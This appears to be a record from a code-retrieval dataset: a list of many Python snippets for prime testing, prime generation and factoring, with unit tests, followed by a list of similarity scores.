False\n k+=1\n return True", "def getPrime(k = 50, verbose = True, extraOutput = False):\n\n # sanity check\n if k < 1:\n print(\"Number of bits in prime must be greater than 0\")\n return False # unsuccessful\n\n ############ START TIMER #########\n start = time.time() # start timing\n\n if extraOutput: # if we are in verose mode\n print(\"=\"*50,\n \"\\nGenerating \", k, \"bit prime... \")\n\n ############ GET ROUNDS OF Miller-Rabin #########\n r = getRounds(k)\n\n if extraOutput:\n print(r, \"rounds of Miller-Rabin needed (according to FISC)\")\n\n ############ GET PRIME LIST FOR TRIAL DIVISION #########\n # get prime list (only do it once for the lowest number k bits could be to speed up\n primeList = getListOfPrimes(k)\n\n if extraOutput:\n print(\"Trial-Division prime list generated, size: \", len(primeList))\n\n\n ############ GENERATE PROBABLE PRIME #########\n prime = False\n numCandidates = 0\n\n # loop till probable prime is found\n while not prime:\n numCandidates += 1 # increment candidate count\n\n candidate = getOddNumber(k) # get an odd number as next candidate\n\n if extraOutput:\n print(\"New candidate...\", candidate)\n\n prime = checks(candidate, primeList, r) # run checks\n\n\n ############ OUTPUT #########\n if verbose:\n print(\"Prime of \", k, \"bits found:\", candidate)\n print(\"Checked %d candidates in %.2f s\" % (numCandidates, time.time() - start))\n\n return candidate", "def test_with_10_prime_numbers(self):\n numbers = [3,5,7,11,13,17,19,23,29,31]\n for number in numbers:\n self.assertFalse(has_divisors(number, int(math.sqrt(number) // 1) + 1), \"Number {} is a prime number.\".format(number))", "def is_prime(n):\n if n <= 1:\n return False\n if n < 4:\n return True\n if n % 2 == 0:\n return False\n if n < 9:\n return True\n if n % 3 == 0:\n return False\n\n limit = int(math.floor(math.sqrt(n)))\n i = 5\n while i <= limit:\n if n % i == 0:\n return False\n if n % (i + 2) == 0:\n return False\n i += 6\n return True", "def palin_primes(n, m):\r\n if n == m:\r\n if is_palin(str(m)):\r\n if is_prime(m, i_unchanging):\r\n print(m)\r\n\r\n elif is_palin(str(n)):\r\n if is_prime(n, i_unchanging):\r\n print(str(n))\r\n palin_primes(n + 1, m)\r\n else:\r\n palin_primes(n + 1, m)\r\n else:\r\n palin_primes(n + 1, m)", "def getPrime(bits):\n\twhile(True) :\n\t\t# on continue a tirer des nombres tant que l'on n'a pas trouve de nombre premier\n\t\tp = getrandbits(bits)\n\t\tif(miller_rabin(p,100)) :\n\t\t\treturn p", "def test_is_prime_valid(self):\n sol = solution.Solution();\n self.assertTrue(sol.isPrime(2))\n self.assertTrue(sol.isPrime(3))\n self.assertTrue(sol.isPrime(7))\n #self.assertTrue(sol.isPrime(863))", "def rand_prime(k=10): \n i = random.randint(2**(k-2),2**(k-1))\n i,l=2*i+1,0\n while True:\n j = 3\n l +=1\n while i%j!=0:\n j += 1\n if i == j:\n return i\n #return i,len(bin(i)[2:]),l\n i += 2", "def Ballie_PSW_test(n, max_trivial_trials=100):\n for i in range(max_trivial_trials):\n if primes[i] == n:\n return True\n if n % primes[i] == 0:\n return False\n if primes[i] ** 2 >= n:\n return True\n if not fermat_strong_test(n, 2):\n return False\n if not lucas_selfridge_test(n):\n return False\n return True", "def test_13(self):\n self.assertTrue(is_prime(13))", "def is_prime(n):\n\n def mr(n, _known_primes=[2, 3], _precision_for_huge_n=16, ):\n\n def _try_composite(a, d, n, s):\n if pow(a, d, n) == 1:\n return False\n for i in range(s):\n if pow(a, 2**i * d, n) == n-1:\n return False\n return True # n is definitely composite\n\n if n in _known_primes:\n return 
True\n if n in (0, 1):\n return False\n if any((n % p) == 0 for p in _known_primes):\n return False\n d, s = n - 1, 0\n while not d % 2:\n d, s = d >> 1, s + 1\n\n # Returns exact according to http://primes.utm.edu/prove/prove2_3.html\n if n < 1373653:\n return not any(_try_composite(a, d, n, s) for a in (2, 3))\n if n < 25326001:\n return not any(_try_composite(a, d, n, s) for a in (2, 3, 5))\n if n < 118670087467:\n if n == 3215031751:\n return False\n return not any(_try_composite(a, d, n, s) for a in (2, 3, 5, 7))\n if n < 2152302898747:\n return not any(_try_composite(a, d, n, s) for a in (2, 3, 5, 7, 11))\n if n < 3474749660383:\n return not any(_try_composite(a, d, n, s) for a in (2, 3, 5, 7, 11, 13))\n if n < 341550071728321:\n return not any(_try_composite(a, d, n, s) for a in (2, 3, 5, 7, 11, 13, 17))\n # otherwise\n return not any(_try_composite(a, d, n, s)\n for a in _known_primes[:_precision_for_huge_n])\n\n def trial_division(n):\n if n < 2:\n return False\n if n < 4:\n return True\n if n % 2 == 0 or n % 3 == 0:\n return False\n\n limit = int(math.sqrt(n))\n divisor = 5\n\n while divisor <= limit:\n if n % divisor == 0 or n % (divisor + 2) == 0:\n return False\n divisor += 6\n\n return True\n\n if 30000000 < n < 341550071728321:\n return mr(n)\n else:\n return trial_division(n)", "def good_prime(p):\n return p % 4 == 3 and probablyPrime(p, accuracy=100)", "def isprime(n):\n if n == 2:\n return True\n if n == 3:\n return True\n if n % 2 == 0:\n return False\n if n % 3 == 0:\n return False\n\n i = 5\n w = 2\n\n while i ** 2 <= n:\n if n % i == 0:\n return False\n\n i += w\n w = 6 - w\n\n return True", "def problem2(m, p):\n total = 0\n for k in range(m, m ** p):\n if is_prime(k):\n total = total + sum_of_digits(k)\n return total", "def isPrime(n):\n if n == 1:\n return False\n elif n < 4:\n return True\n elif n % 2 == 0:\n return False\n elif n < 9:\n return True\n elif n % 3 == 0:\n return False\n else:\n r = int(floor(sqrt(n)))\n f = 5\n while f <= r:\n if n % f == 0: return False\n if n % (f+2) == 0: return False\n f += 6\n return True", "def factorPR(n):\r\n\tfor slow in [2,3,4,6]:\r\n\t\tnumsteps=2*math.floor(math.sqrt(math.sqrt(n))); fast=slow; i=1\r\n\t\twhile i<numsteps:\r\n\t\t\tslow = (slow*slow + 1) % n\r\n\t\t\ti = i + 1\r\n\t\t\tfast = (fast*fast + 1) % n\r\n\t\t\tfast = (fast*fast + 1) % n\r\n\t\t\tg = gcd(fast-slow,n)\r\n\t\t\tif (g != 1):\r\n\t\t\t\tif (g == n):\r\n\t\t\t\t\tbreak\r\n\t\t\t\telse:\r\n\t\t\t\t\treturn g\r\n\treturn 1", "def prime_test(n,p):\n for i in range(2, p):\n thing = 1\n while thing == 1:\n if n % i == 0:\n n = n/i\n else:\n thing = 0\n if n == 1:\n return False\n return True", "def isPrime(n):\n if n == 2:\n return True\n if n == 3:\n return True\n if n % 2 == 0:\n return False\n if n % 3 == 0:\n return False\n i = 5\n w = 2\n while i * i <= n:\n if n % i == 0:\n return False\n i += w\n w = 6 - w\n\n return True", "def gen_prime():\n\n n = 100\n if n == 2:\n return [2]\n elif n < 2:\n return []\n s = range(3, n + 1, 2)\n mroot = n ** 0.5\n half = (n + 1) / 2 - 1\n i = 0\n m = 3\n while m <= mroot:\n if s[i]:\n j = (m * m - 3) / 2\n s[j] = 0\n while j < half:\n s[j] = 0\n j += m\n i = i + 1\n m = 2 * i + 3\n primes = [2] + [x for x in s if x]\n return (primes[random.randint(1, len(primes) - 1)])", "def test_if_it_outputs_correct_output(self):\n self.assertEquals(prime_numbers(5), [2, 3, 5])", "def is_prime(n, number_of_tests=5):\n passes = 0\n prime = True #assume prime\n for i in xrange(number_of_tests):\n passes += 1\n random_int = 
random.randint(2, n-1)\n test = pow(random_int, n-1, n)\n if test != 1:\n prime = False\n break\n if prime:\n return 0\n else:\n return passes", "def test_if_it_outputs_correct_output_for_numbers_greater_than_50(self):\n self.assertEquals(len(prime_numbers(55)), 16)", "def isPrime(n): \n if n == 2 or n == 3: return True\n if n < 2 or n%2 == 0: return False\n if n < 9: return True\n if n%3 == 0: return False\n r = int(n**0.5)\n f = 5\n #Loop seeks out next prime factor and returns it\n while f <= r:\n if n%f == 0: return (False, f)\n if n%(f+2) == 0: return (False, (f+2))\n f +=6\n return True", "def is_prime(n):\n if n == 2 or n == 3: return True\n if n < 2 or n % 2 == 0: return False\n if n < 9: return True\n if n % 3 == 0: return False\n r = int(sqrt(n))\n f = 5\n while f <= r:\n if n % f == 0: return False\n if n % (f + 2) == 0: return False\n f += 6\n return True", "def test_handcrafted_examples(self):\n for i in range(1000):\n self.assertEqual(perfectd(0), True)\n self.assertEqual(prime(0), False)\n self.assertEqual(prime(2), True)\n self.assertEqual(prime(7), True)\n self.assertEqual(prime(15), False)\n self.assertEqual(perfectd(6), True)\n self.assertEqual(perfectd(15), False)", "def is_prime(n, k):\n if n <= 1 or n == 4:\n return False\n if n <= 3:\n return True\n if is_even(n):\n return False\n while k > 0:\n\n # Take random int in [2, n-2]\n a = random.randint(2, n-1)\n\n # Check if a and n are co-prime.\n if gcd(n, a) != 1:\n return False\n\n # Fermat's little theorem\n if modpow(a, n-1, n) != 1:\n return False\n\n k -= 1\n\n return True", "def radicale(n):\n r = 1\n for p in primi(n+1):\n if p>n:\n break\n if n%p==0:\n r *= p\n n = n//p\n return r", "def aks( n ):\n\n def aks_mod( polynomial , r ):\n \"\"\"\n This function is used in aks.\n polynomial modulo ( x^r - 1 )\n \"\"\"\n aks_mod = polynomial.coefficients\n total = aks_mod[ : r ]\n aks_mod = aks_mod[ r : ]\n while len(aks_mod) - 1 >= r :\n for i in range(r):\n total[i] += aks_mod[i]\n aks_mod = aks_mod[ r : ]\n for i in range(len(aks_mod)):\n total[i] += aks_mod[i]\n return array_poly_mod( total , polynomial.mod )\n\n lg = math.log( n , 2 )\n k = int( lg * lg )\n\n if arith1.powerDetection( n )[ 1 ] != 1: #Power Detection\n print(\" n is not prime \")\n return False\n\n start = 3\n while 1:\n d = arith1.gcd.gcd( start , n )\n if 1 < d < n:\n print(\"n is not prime\")\n return False\n x = n % start\n N = x\n for i in range( 1 , k + 1 ):\n if N == 1:\n break\n N = ( N * x ) % start\n if i == k:\n r = start\n break\n start += 1\n d = arith1.gcd.gcd( r , n )\n if 1 < d < n:\n print(\" n is not prime \")\n return False\n if n <= r:\n print(\" n is prime \")\n return True\n\n e = multiplicative.euler( r ) #Cyclotomic Conguence\n e = math.sqrt( e )\n e = int( e * lg )\n for b in range( 1 , e+1 ):\n f = array_poly_mod( [ b , 1 ] , n )\n total = array_poly_mod( [ 1 ] , n )\n count = n\n while count > 0:\n if count & 1:\n total = total * f\n total = aks_mod( total , r )\n f = f.power()\n f = aks_mod( f , r )\n count = count >> 1\n total_poly = total.coefficients_to_dict()\n if total_poly != { 0 : b , n % r : 1 }:\n print(\" n is not prime \")\n return False\n print(\" n is prime \")\n return True", "def isPrime(n):\r\n if n == 2:\r\n return True\r\n if n == 3:\r\n return True\r\n if n % 2 == 0:\r\n return False\r\n if n % 3 == 0:\r\n return False\r\n\r\n i = 5\r\n w = 2\r\n\r\n while i * i <= n:\r\n if n % i == 0:\r\n return False\r\n\r\n i += w\r\n w = 6 - w\r\n\r\n return True", "def _check_is_prime(possible_prime: int, 
test_rounds: int = 40) -> bool:\n\n # 2^s * d = n - 1\n d = possible_prime - 1\n s = 0\n while (d & 1) == 0: # d is even\n s += 1\n d >>= 1 # division by 2 of even number\n\n for i in range(test_rounds):\n if not _miller_rabin_test(possible_prime, d):\n return False\n\n return True", "def isprime(n=936):\n if n < 3: return False\n for i in range(2, n):\n if n % i == 0:\n return False\n return True", "def is_prime(n):\n if n <= 1: return False\n if n <= 3: return True\n\n if (n % 2 == 0 or n % 3 == 0):\n return False\n\n i = 5\n while i * i <= n:\n if n % i == 0 or n % (i + 2) == 0:\n return False\n i += 6\n return True", "def test_prime_2(self):\n\t self.assertTrue(prime_generator(2), [2])", "def prma(u:int, l:int=2,primesDict:dict = primesDict)->None:\r\n if len(primesDict) <= 1:\r\n primesDict[2] = 1\r\n primesDict[3] = 2\r\n \r\n psrt = 2\r\n while l <= u: # while the number (l) is less than(or equal to ) the given\r\n \r\n if l > psrt**2: # if l exceeds the previous val of psrt\r\n\r\n psrt = (l**0.5) # psrt = sqrt(l)\r\n\r\n for i in primesDict: #for the primes currently in primesDict\r\n\r\n if i > psrt: # You need to only check till the sqrt(l) to see if it is a prime..\r\n primesDict[l] = len(primesDict)+1 #if it exceeds the value then it must be prime..\r\n break\r\n\r\n if l % i == 0: # if it is divisible.. it jumps to the next number for l i.e: l++\r\n break\r\n l += 1", "def test_5(self):\n self.assertTrue(is_prime(5))", "def isPrime(n, primes):\n\n k = math.log(n, 2) # number of bits in n\n r = getRounds(k)\n\n return checks(n, primes, r) # run checks", "def test_with_10_not_prime_numbers(self):\n numbers = [4,8,10,15,20,155,270,300,444,985]\n for number in numbers:\n self.assertTrue(has_divisors(number, int(math.sqrt(number) // 1) + 1), \"Number {} is not a prime number.\".format(number))", "def prime(n):\n if n < 2:\n return False\n if n == 2:\n return True\n if n == 3:\n return True\n if n % 2 == 0:\n return False\n if n % 3 == 0:\n return False\n\n i = 5\n w = 2\n\n while i * i <= n:\n if n % i == 0:\n return False\n\n i += w\n w = 6 - w\n\n return True", "def generate_large_prime(bit_size=1024):\n while True:\n p = random.randint(2**(bit_size-1), 2**bit_size)\n if is_prime(p):\n return p", "def isprime(n):\n if n == 2:\n return True\n if n == 3:\n return True\n if n % 2 == 0:\n divisors[n] = n // 2\n return False\n if n % 3 == 0:\n divisors[n] = 3\n return False\n\n if n in primes:\n return primes[n]\n\n i = 5\n w = 2\n\n while i * i <= n:\n if n % i == 0:\n divisors[n] = n // i\n primes[n] = False\n return False\n i += w\n w = 6 - w\n\n primes[n] = True\n return True", "def isprime(n):\n if n % 2 == 0:return False\n return all(n % i for i in range(3, int(n**0.5) + 1, 2))", "def main() -> int:\n\n a = None\n for n, g in enumerate(gen_primes(100000, 1000000)):\n repeat, indices = check_if_has_3_repeated_digits(str(g))\n if repeat:\n a = check_for_family_of_primes(repeat, indices, list(str(g)))\n if len(a) > 7 and min(a) > 100000:\n EULER_LOGGER.debug(f\"{a}\")\n a = min([int(i) for i in a])\n break\n\n return a", "def test_5():\n assert primes(5) == [2, 3, 5, 7, 11]", "def is_prime(n):\r\n if n in (2, 3, 5, 7, 11, 13, 17, 19): return(True)\r\n if (n<=1 or n%2==0 or n%3==0): return(False)\r\n # determine upper limit of test range =>\r\n ulimit = (int(math.ceil(math.sqrt(n)))+1)\r\n return(not any(n%k==0 for k in range(3, ulimit, 2)))", "def maybe_prime(n: int, k: int = 3) -> bool:\n if n < 2:\n return False\n for p in small_primes:\n if n < p * p:\n return True\n if n % p 
== 0:\n return False\n r, s = 0, n - 1\n while s % 2 == 0:\n r += 1\n s //= 2\n for _ in range(k):\n a = randrange(2, n - 1)\n x = pow(a, s, n)\n if x == 1 or x == n - 1:\n continue\n for _ in range(r - 1):\n x = pow(x, 2, n)\n if x == n - 1:\n break\n else:\n return False\n return True", "def Pollard_rho_factor(n, check_prime=False):\n if check_prime and Miller_Rabin_test(n):\n return n\n\n if even(n):\n return 2\n\n while True:\n x0 = randint(2, n - 1)\n c = randint(1, n - 1)\n g = Pollard_rho_Floyd(n, x0, c)\n if g != n:\n return g", "def fermat_prime(n: int, k: int) -> int:\n assert n > 3 and k >= 1\n for _ in range(k):\n a = random.randint(2, n - 2)\n if pow(a, n - 1, n) != 1: # (a**(n-1)%n) != 1:\n return False\n return True", "def find_good_prime(num_bits=512):\n candidate = 1\n\n while not good_prime(candidate):\n candidate = random.getrandbits(num_bits)\n\n return candidate", "def isprime(n):\r\n\treturn is_prime(n)", "def solve(limit):\n upper_limit = ceil(sqrt(limit - 2**4 - 2**3))\n p_list = PrimeList(upper_limit)\n\n num_set = set()\n for x in p_list:\n val = limit - 2**4 - x**3\n if val < 0: continue\n lim = ceil(sqrt(val))\n for y in takewhile(lambda i: i<lim, p_list):\n val = limit - min(x,y)**4 - max(x,y)**3\n if val < 0: continue\n lim = ceil(sqrt(val))\n for z in takewhile(lambda i: i<lim, p_list):\n\n for a,b,c in permutations([x,y,z]):\n ans = a**2 + b**3 + c**4\n if ans > limit: continue\n num_set.add(ans)\n if a ==b and b == c: break\n\n return len(num_set)", "def is_prime(n):\n test_vals = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37]\n if n in test_vals:\n return True\n d = n - 1\n s = 0\n while not d & 1:\n d = d >> 1\n s += 1\n for a in test_vals:\n for r in range(0, s):\n if (a ** (d * (1 << r))) % n != (n - 1) \\\n and (a ** d) % n != 1:\n return False\n return True", "def basic_is_prime(_n):\n if _n < 2:\n return False\n for p in [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53, 59, 61, 67, 71, 73, 79, 83, 89, 97, 101,\n 103, 107, 109, 113, 127, 131, 137, 139, 149, 151, 157, 163, 167, 173, 179, 181, 191, 193, 197, 199,\n 211, 223, 227, 229, 233, 239, 241, 251, 257, 263, 269, 271, 277, 281, 283, 293, 307, 311, 313, 317,\n 331, 337, 347, 349, 353, 359, 367, 373, 379, 383, 389, 397, 401, 409, 419, 421, 431, 433, 439, 443,\n 449, 457, 461, 463, 467, 479, 487, 491, 499, 503, 509, 521, 523, 541, 547, 557, 563, 569, 571, 577,\n 587, 593, 599, 601, 607, 613, 617, 619, 631, 641, 643, 647, 653, 659, 661, 673, 677, 683, 691, 701,\n 709, 719, 727, 733, 739, 743, 751, 757, 761, 769, 773, 787, 797, 809, 811, 821, 823, 827, 829, 839,\n 853, 857, 859, 863, 877, 881, 883, 887, 907, 911, 919, 929, 937, 941, 947, 953, 967, 971, 977, 983,\n 991, 997, 1009, 1013, 1019, 1021, 1031, 1033, 1039, 1049, 1051, 1061, 1063, 1069, 1087, 1091, 1093,\n 1097, 1103, 1109, 1117, 1123, 1129, 1151, 1153, 1163, 1171, 1181, 1187, 1193, 1201, 1213, 1217, 1223,\n 1229, 1231, 1237, 1249, 1259, 1277, 1279, 1283, 1289, 1291, 1297, 1301, 1303, 1307, 1319, 1321, 1327,\n 1361, 1367, 1373, 1381, 1399, 1409, 1423, 1427, 1429, 1433, 1439, 1447, 1451, 1453, 1459, 1471, 1481,\n 1483, 1487, 1489, 1493, 1499, 1511, 1523, 1531, 1543, 1549, 1553, 1559, 1567, 1571, 1579, 1583, 1597,\n 1601, 1607, 1609, 1613, 1619, 1621, 1627, 1637, 1657, 1663, 1667, 1669, 1693, 1697, 1699, 1709, 1721,\n 1723, 1733, 1741, 1747, 1753, 1759, 1777, 1783, 1787, 1789, 1801, 1811, 1823, 1831, 1847, 1861, 1867,\n 1871, 1873, 1877, 1879, 1889, 1901, 1907, 1913, 1931, 1933, 1949, 1951, 1973, 1979, 1987, 1993, 1997,\n 1999, 2003, 
2011, 2017, 2027, 2029, 2039, 2053, 2063, 2069, 2081, 2083, 2087, 2089, 2099, 2111, 2113,\n 2129, 2131, 2137, 2141, 2143, 2153, 2161, 2179, 2203, 2207, 2213, 2221, 2237, 2239, 2243, 2251, 2267,\n 2269, 2273, 2281, 2287, 2293, 2297, 2309, 2311, 2333, 2339, 2341, 2347, 2351, 2357, 2371, 2377, 2381,\n 2383, 2389, 2393, 2399, 2411, 2417, 2423, 2437, 2441, 2447, 2459, 2467, 2473, 2477, 2503, 2521, 2531,\n 2539, 2543, 2549, 2551, 2557, 2579, 2591, 2593, 2609, 2617, 2621, 2633, 2647, 2657, 2659, 2663, 2671,\n 2677, 2683, 2687, 2689, 2693, 2699, 2707, 2711, 2713, 2719, 2729, 2731, 2741, 2749, 2753, 2767, 2777,\n 2789, 2791, 2797, 2801, 2803, 2819, 2833, 2837, 2843, 2851, 2857, 2861, 2879, 2887, 2897, 2903, 2909,\n 2917, 2927, 2939, 2953, 2957, 2963, 2969, 2971, 2999, 3001, 3011, 3019, 3023, 3037, 3041, 3049, 3061,\n 3067, 3079, 3083, 3089, 3109, 3119, 3121, 3137, 3163, 3167, 3169, 3181, 3187, 3191, 3203, 3209, 3217,\n 3221, 3229, 3251, 3253, 3257, 3259, 3271, 3299, 3301, 3307, 3313, 3319, 3323, 3329, 3331, 3343, 3347,\n 3359, 3361, 3371, 3373, 3389, 3391, 3407, 3413, 3433, 3449, 3457, 3461, 3463, 3467, 3469, 3491, 3499,\n 3511, 3517, 3527, 3529, 3533, 3539, 3541, 3547, 3557, 3559, 3571, 3581, 3583, 3593, 3607, 3613, 3617,\n 3623, 3631, 3637, 3643, 3659, 3671, 3673, 3677, 3691, 3697, 3701, 3709, 3719, 3727, 3733, 3739, 3761,\n 3767, 3769, 3779, 3793, 3797, 3803, 3821, 3823, 3833, 3847, 3851, 3853, 3863, 3877, 3881, 3889, 3907,\n 3911, 3917, 3919, 3923, 3929, 3931, 3943, 3947, 3967, 3989, 4001, 4003, 4007, 4013, 4019, 4021, 4027,\n 4049, 4051, 4057, 4073, 4079, 4091, 4093, 4099, 4111, 4127, 4129, 4133, 4139, 4153, 4157, 4159, 4177,\n 4201, 4211, 4217, 4219, 4229, 4231, 4241, 4243, 4253, 4259, 4261, 4271, 4273, 4283, 4289, 4297, 4327,\n 4337, 4339, 4349, 4357, 4363, 4373, 4391, 4397, 4409, 4421, 4423, 4441, 4447, 4451, 4457, 4463, 4481,\n 4483, 4493, 4507, 4513, 4517, 4519, 4523, 4547, 4549, 4561, 4567, 4583, 4591, 4597, 4603, 4621, 4637,\n 4639, 4643, 4649, 4651, 4657, 4663, 4673, 4679, 4691, 4703, 4721, 4723, 4729, 4733, 4751, 4759, 4783,\n 4787, 4789, 4793, 4799, 4801, 4813, 4817, 4831, 4861, 4871, 4877, 4889, 4903, 4909, 4919, 4931, 4933,\n 4937, 4943, 4951, 4957, 4967, 4969, 4973, 4987, 4993, 4999, 5003, 5009, 5011, 5021, 5023, 5039, 5051,\n 5059, 5077, 5081, 5087, 5099, 5101, 5107, 5113, 5119, 5147, 5153, 5167, 5171, 5179, 5189, 5197, 5209,\n 5227, 5231, 5233, 5237, 5261, 5273, 5279, 5281, 5297, 5303, 5309, 5323, 5333, 5347, 5351, 5381, 5387,\n 5393, 5399, 5407, 5413, 5417, 5419, 5431, 5437, 5441, 5443, 5449, 5471, 5477, 5479, 5483, 5501, 5503,\n 5507, 5519, 5521, 5527, 5531, 5557, 5563, 5569, 5573, 5581, 5591, 5623, 5639, 5641, 5647, 5651, 5653,\n 5657, 5659, 5669, 5683, 5689, 5693, 5701, 5711, 5717, 5737, 5741, 5743, 5749, 5779, 5783, 5791, 5801,\n 5807, 5813, 5821, 5827, 5839, 5843, 5849, 5851, 5857, 5861, 5867, 5869, 5879, 5881, 5897, 5903, 5923,\n 5927, 5939, 5953, 5981, 5987, 6007, 6011, 6029, 6037, 6043, 6047, 6053, 6067, 6073, 6079, 6089, 6091,\n 6101, 6113, 6121, 6131, 6133, 6143, 6151, 6163, 6173, 6197, 6199, 6203, 6211, 6217, 6221, 6229, 6247,\n 6257, 6263, 6269, 6271, 6277, 6287, 6299, 6301, 6311, 6317, 6323, 6329, 6337, 6343, 6353, 6359, 6361,\n 6367, 6373, 6379, 6389, 6397, 6421, 6427, 6449, 6451, 6469, 6473, 6481, 6491, 6521, 6529, 6547, 6551,\n 6553, 6563, 6569, 6571, 6577, 6581, 6599, 6607, 6619, 6637, 6653, 6659, 6661, 6673, 6679, 6689, 6691,\n 6701, 6703, 6709, 6719, 6733, 6737, 6761, 6763, 6779, 6781, 6791, 6793, 6803, 6823, 6827, 6829, 6833,\n 6841, 6857, 6863, 6869, 6871, 
6883, 6899, 6907, 6911, 6917, 6947, 6949, 6959, 6961, 6967, 6971, 6977,\n 6983, 6991, 6997, 7001, 7013, 7019, 7027, 7039, 7043, 7057, 7069, 7079, 7103, 7109, 7121, 7127, 7129,\n 7151, 7159, 7177, 7187, 7193, 7207, 7211, 7213, 7219, 7229, 7237, 7243, 7247, 7253, 7283, 7297, 7307,\n 7309, 7321, 7331, 7333, 7349, 7351, 7369, 7393, 7411, 7417, 7433, 7451, 7457, 7459, 7477, 7481, 7487,\n 7489, 7499, 7507, 7517, 7523, 7529, 7537, 7541, 7547, 7549, 7559, 7561, 7573, 7577, 7583, 7589, 7591,\n 7603, 7607, 7621, 7639, 7643, 7649, 7669, 7673, 7681, 7687, 7691, 7699, 7703, 7717, 7723, 7727, 7741,\n 7753, 7757, 7759, 7789, 7793, 7817, 7823, 7829, 7841, 7853, 7867, 7873, 7877, 7879, 7883, 7901, 7907,\n 7919, 7927, 7933, 7937, 7949, 7951, 7963, 7993, 8009, 8011, 8017, 8039, 8053, 8059, 8069, 8081, 8087,\n 8089, 8093, 8101, 8111, 8117, 8123, 8147, 8161, 8167, 8171, 8179, 8191, 8209, 8219, 8221, 8231, 8233,\n 8237, 8243, 8263, 8269, 8273, 8287, 8291, 8293, 8297, 8311, 8317, 8329, 8353, 8363, 8369, 8377, 8387,\n 8389, 8419, 8423, 8429, 8431, 8443, 8447, 8461, 8467, 8501, 8513, 8521, 8527, 8537, 8539, 8543, 8563,\n 8573, 8581, 8597, 8599, 8609, 8623, 8627, 8629, 8641, 8647, 8663, 8669, 8677, 8681, 8689, 8693, 8699,\n 8707, 8713, 8719, 8731, 8737, 8741, 8747, 8753, 8761, 8779, 8783, 8803, 8807, 8819, 8821, 8831, 8837,\n 8839, 8849, 8861, 8863, 8867, 8887, 8893, 8923, 8929, 8933, 8941, 8951, 8963, 8969, 8971, 8999, 9001,\n 9007, 9011, 9013, 9029, 9041, 9043, 9049, 9059, 9067, 9091, 9103, 9109, 9127, 9133, 9137, 9151, 9157,\n 9161, 9173, 9181, 9187, 9199, 9203, 9209, 9221, 9227, 9239, 9241, 9257, 9277, 9281, 9283, 9293, 9311,\n 9319, 9323, 9337, 9341, 9343, 9349, 9371, 9377, 9391, 9397, 9403, 9413, 9419, 9421, 9431, 9433, 9437,\n 9439, 9461, 9463, 9467, 9473, 9479, 9491, 9497, 9511, 9521, 9533, 9539, 9547, 9551, 9587, 9601, 9613,\n 9619, 9623, 9629, 9631, 9643, 9649, 9661, 9677, 9679, 9689, 9697, 9719, 9721, 9733, 9739, 9743, 9749,\n 9767, 9769, 9781, 9787, 9791, 9803, 9811, 9817, 9829, 9833, 9839, 9851, 9857, 9859, 9871, 9883, 9887,\n 9901, 9907, 9923, 9929, 9931, 9941, 9949, 9967, 9973]:\n if _n % p == 0:\n return _n == p\n if _n < 1E8: # Limit 1E8, because we have all primes below 1E4\n return True\n else:\n return None" ]
[ "0.761824", "0.7428767", "0.73708177", "0.73257506", "0.73257506", "0.7152389", "0.704289", "0.69547087", "0.69087857", "0.6902767", "0.69024384", "0.68879527", "0.6800044", "0.6790292", "0.6718005", "0.66617966", "0.65989155", "0.65562785", "0.6515376", "0.6470473", "0.64568293", "0.64470726", "0.6439593", "0.64299315", "0.63277215", "0.6285788", "0.62825024", "0.6279448", "0.6264597", "0.6260421", "0.62279403", "0.6206977", "0.6180007", "0.61727923", "0.6155819", "0.6149182", "0.6119821", "0.6117668", "0.61036336", "0.6094585", "0.6088271", "0.60842365", "0.6083314", "0.60738677", "0.6071956", "0.60670817", "0.6055906", "0.6052203", "0.60344446", "0.601949", "0.60189426", "0.60183614", "0.6015253", "0.6014312", "0.60137486", "0.6004373", "0.59988827", "0.59972984", "0.59972286", "0.59956217", "0.59930134", "0.5992938", "0.59667665", "0.59656984", "0.5952217", "0.59511447", "0.5943307", "0.593549", "0.5931461", "0.5922597", "0.59166336", "0.59079874", "0.58999026", "0.58964026", "0.5895596", "0.58879846", "0.588118", "0.58661413", "0.5862118", "0.5855401", "0.5854364", "0.58506423", "0.584678", "0.58419615", "0.58290994", "0.58281004", "0.58253485", "0.58208215", "0.580188", "0.5794643", "0.57942456", "0.5791576", "0.57840276", "0.5779877", "0.5770533", "0.5761347", "0.5755985", "0.5748669", "0.5744463", "0.574183" ]
0.7301876
5
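
The negatives in the row above are mostly Miller-Rabin and trial-division variants. As a minimal, self-contained sketch of the probabilistic core most of them share (standard library only; the default witness count of 20 is an arbitrary assumption, not taken from any snippet above):

    import random

    def miller_rabin(n: int, k: int = 20) -> bool:
        # Probabilistic primality test: False means composite,
        # True means probable prime (error probability at most 4**-k).
        if n < 2:
            return False
        for p in (2, 3, 5, 7, 11, 13):
            if n % p == 0:
                return n == p
        # Write n - 1 as 2**s * d with d odd.
        d, s = n - 1, 0
        while d % 2 == 0:
            d, s = d // 2, s + 1
        for _ in range(k):
            a = random.randrange(2, n - 1)
            x = pow(a, d, n)
            if x in (1, n - 1):
                continue
            for _ in range(s - 1):
                x = pow(x, 2, n)
                if x == n - 1:
                    break
            else:
                return False  # a is a witness that n is composite
        return True
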
Get current NFL season. After March, returns year of upcoming season.
def current_season() -> int:
    now = datetime.now()
    month, year = now.month, now.year
    if month < 4:
        year -= 1
    return year
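
A quick usage sketch of the document function (it requires datetime imported from the datetime module; the dates in the comments are illustrative assumptions, not from the source):

    print(current_season())
    # -> 2023 if run in February 2024 (the 2023 NFL season is still underway)
    # -> 2024 if run in September 2024 (the upcoming 2024 season)
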
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def current_season():\n td = datetime.datetime.today()\n if td.month > 8:\n return td.year\n return td.year - 1", "def latest_season_before(date):\n\tif date.month < 9:\n\t\treturn date.year - 1\n\treturn date.year", "def return_football_season(date=datetime.datetime.today()):\n date_aux = subtract_months(date, 6)\n beginning_year = str(date_aux.year)\n ending_year = date_aux.year + 1\n ending_year = str(ending_year)[-2:]\n season = ''.join([beginning_year, '-', ending_year])\n return season", "def get_upcoming_season(self):\n result = self._method_call(\"UpcomingSeason\")\n return int(result)", "def get_current_player_season(self):\n return self.get_player_season(\"current\")", "def media_season(self):\n media_status = self._media_status()[0]\n return media_status.season if media_status else None", "def getSeason(date):\n\n date = validate.timestamp(date)\n day = date.dayofyear\n leap_year = int(date.is_leap_year)\n\n spring = numpy.arange(80, 172) + leap_year\n summer = numpy.arange(172, 264) + leap_year\n autumn = numpy.arange(264, 355) + leap_year\n\n if day in spring:\n season = \"spring\"\n elif day in summer:\n season = \"summer\"\n elif day in autumn:\n season = \"autumn\"\n else:\n season = 